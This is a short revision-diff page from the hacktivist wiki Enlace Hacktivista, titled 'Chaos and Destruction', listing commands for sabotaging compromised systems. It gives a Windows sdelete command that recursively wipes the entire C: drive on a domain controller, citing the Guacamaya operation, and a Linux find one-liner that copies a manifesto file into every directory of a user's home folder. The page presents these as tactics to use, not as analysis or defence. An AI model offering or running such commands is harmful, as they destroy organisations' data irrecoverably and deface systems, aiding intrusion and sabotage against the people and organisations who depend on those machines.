Chaos and Destruction: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
Booda (talk | contribs)
Chaos and Destruction
 
Booda (talk | contribs)
Line 1: Line 1:
== Windows ==
== Windows ==
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code>


== Linux ==
== Linux ==
Print your manifesto across a system
Print your manifesto across a system
* <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code>
* <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code>

Revision as of 20:12, 24 July 2023

Windows

  • Guacamaya (2:13:35 Wiping windows domain with sdelete on the domain controller) sdelete64.exe -accepteula -r -s C:\*

Linux

Print your manifesto across a system

  • find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;